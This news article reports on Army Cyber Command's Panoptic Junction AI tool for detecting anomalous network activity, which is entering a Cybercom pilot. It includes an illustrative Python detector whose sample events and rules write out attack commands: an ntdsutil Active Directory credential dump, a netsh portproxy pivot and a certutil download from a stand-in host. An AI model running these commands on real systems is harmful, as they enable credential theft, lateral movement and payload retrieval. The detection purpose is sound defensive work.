Army Cyber AI monitoring tool moves to 12-month pilot
An artificial intelligence tool developed through Army Cyber Command for continuous monitoring of anomalous behavior on the network is moving into a year-long pilot with U.S. Cyber Command.
The tool, dubbed Panoptic Junction or PJ, is part of the Defense Department’s solution to fulfill a key directive in President Joe Biden’s watershed artificial intelligence executive order that, among many tasks, directed the secretary of defense to develop plans for, conduct and complete an operational pilot to “identify, develop, test, evaluate and deploy AI capabilities, such as large-language models, to aid in the discovery and remediation of vulnerabilities in critical United States Government software, systems, and networks.”
Cybercom is leading that effort on behalf of the DOD and, in working with Army Cyber Command, designated its Panoptic Junction tool to fulfill that directive.
Following a months-long prototyping effort, it was determined that the tool effectively detected malicious traffic, according to Lt. Gen. Maria Barrett, commander of Army Cyber Command.
“We determined that any missed detections were either unsuccessful attacks or behaviors that could be categorized as benign,” she said in an interview.
Following those favorable prototype results, PJ will enter a 12-month pilot for Cybercom that takes observations from the prototype and focuses on improved integration, usability, system performance, enhanced analytics and false positive reduction, she added.
PJ’s primary goal is to enhance the detection of anomalous and malicious cyber activity through scalable and continuous monitoring. That includes living off the land, in which an intruder uses legitimate administrative tools and accounts already present on a system rather than custom malware, so there is no malicious file for signature-based tools to match. It is seen as a significant step towards more effective digital security.
Living-off-the-land techniques have come into sharp focus with the May 2023 disclosure of a Chinese state-sponsored actor tracked as Volt Typhoon. That threat has been found to have penetrated U.S. critical infrastructure systems at an unprecedented scale — over a year later, the government is still finding remnants — signaling a paradigm shift in China’s cyber actions.
PJ uses AI-driven, programmatic access to the Enterprise Mission Assurance Support Service (eMASS), the DOD platform that records each system’s security controls, findings and authorization to operate, together with threat intelligence to identify which risks most apply to a specific enclave’s architecture. It delivers those priorities to a second set of AI-driven functions that conduct event log analysis and identify anomalies or malicious activity. PJ is novel in that it uses artificial intelligence to link eMASS with continuous cybersecurity monitoring tools.
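The two-stage flow described above (posture plus threat intelligence sets priorities; a second stage scores log events against them) can be sketched in a few dozen lines. The following is an added example written for this page, not PJ’s code, and it does not use the real eMASS API: the enclave posture record, the threat-intelligence mapping, the detection rules and the process-creation events are all constructed stand-ins so it runs offline. It also picks up the living-off-the-land theme from earlier in the article by matching commands that abuse built-in Windows tools (ntdsutil, netsh portproxy, certutil) and leaving ordinary uses of the same binaries alone.

```python
"""Compliance-aware living-off-the-land detector (illustrative, not PJ's code)."""
import re

# Constructed stand-in for what a programmatic posture query might return about
# one enclave: its components and open findings per component. Hypothetical
# schema; the real eMASS data model is not reproduced here.
ENCLAVE_POSTURE = {
    "name": "enclave-A",
    "components": ["windows-server", "active-directory", "linux-web"],
    "open_findings": {"windows-server": 1, "active-directory": 3, "linux-web": 0},
}

# Constructed threat-intel feed: which behaviours are reported against which
# component types, with a base severity. Hypothetical values.
THREAT_INTEL = {
    "ntdsutil_credential_dump": {"targets": ["active-directory"], "severity": 9},
    "netsh_portproxy_pivot": {"targets": ["windows-server"], "severity": 7},
    "certutil_download": {"targets": ["windows-server"], "severity": 6},
    "kubectl_exec_abuse": {"targets": ["kubernetes"], "severity": 8},  # absent here
}

# Detection rules over a process command line. Each targets the abusive form of
# a legitimate tool, so routine uses (hashing a file, listing services) pass.
RULES = {
    "ntdsutil_credential_dump": re.compile(r"ntdsutil.*\bifm\b", re.I),
    "netsh_portproxy_pivot": re.compile(r"netsh\s+interface\s+portproxy\s+add", re.I),
    "certutil_download": re.compile(r"certutil(\.exe)?\s+.*-urlcache.*-split", re.I),
}

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS02", "cmdline": "powershell.exe -Command Get-Service"},
    {"host": "WS02", "cmdline": "certutil -hashfile installer.msi SHA256"},
    {"host": "WS02", "cmdline": "netsh interface portproxy add v4tov4 listenport=9999 "
                                "connectaddress=10.0.0.5 connectport=8443"},
    {"host": "WS02", "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"host": "DC01", "cmdline": r'ntdsutil "ac i ntds" ifm "create full C:\Temp\x" q q'},
]


def prioritize(posture, intel):
    """Stage one: score each behaviour for this enclave.

    Base severity is scaled by (1 + open findings) on the components the
    behaviour targets; behaviours aimed at components the enclave does not
    have score 0, so stage two can deprioritize them.
    """
    scores = {}
    for name, info in intel.items():
        present = [c for c in info["targets"] if c in posture["components"]]
        if not present:
            scores[name] = 0
            continue
        findings = sum(posture["open_findings"].get(c, 0) for c in present)
        scores[name] = info["severity"] * (1 + findings)
    return scores


def analyze(events, priorities):
    """Stage two: run the rules over events and rank hits by enclave priority."""
    alerts = []
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                alerts.append({"host": ev["host"], "behaviour": name,
                               "priority": priorities.get(name, 0),
                               "cmdline": ev["cmdline"]})
    alerts.sort(key=lambda a: a["priority"], reverse=True)
    return alerts


if __name__ == "__main__":
    prio = prioritize(ENCLAVE_POSTURE, THREAT_INTEL)
    for alert in analyze(SAMPLE_EVENTS, prio):
        print(f'[{alert["priority"]:>3}] {alert["host"]} {alert["behaviour"]}: {alert["cmdline"]}')
```

With the constructed posture, the directory-service finding count pushes the ntdsutil hit to the top of the list even though it appears last in the event stream, while the two benign commands produce no alert at all; swapping in a different enclave record changes the ranking without touching the rules.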
Cybercom officials have lauded PJ in the past, describing it as effective, fast and agile.
“ARCYBER is piloting an AI, machine learning platform that will enable scalable, continuous security monitoring of networks and platforms. It analyzes system compliance, threat intelligence and streaming cyber event data, which will enable advanced detection of adversary activity, malware and anomalies at speeds that human analysts would not come close to,” Morgan Adamski, executive director of Cybercom, said at the CyberTalks conference in October. “But not only is it fast, it’s agile. It is rapidly taking the pulse of networks and assimilating threat information simultaneously, protecting networks in real time … It’s increased efficiencies in operations and maintenance. It’s improved our ability to identify risk and detect adversary activity. It’s … provided real-time hardening recommendations and improved the technical ability of our force.”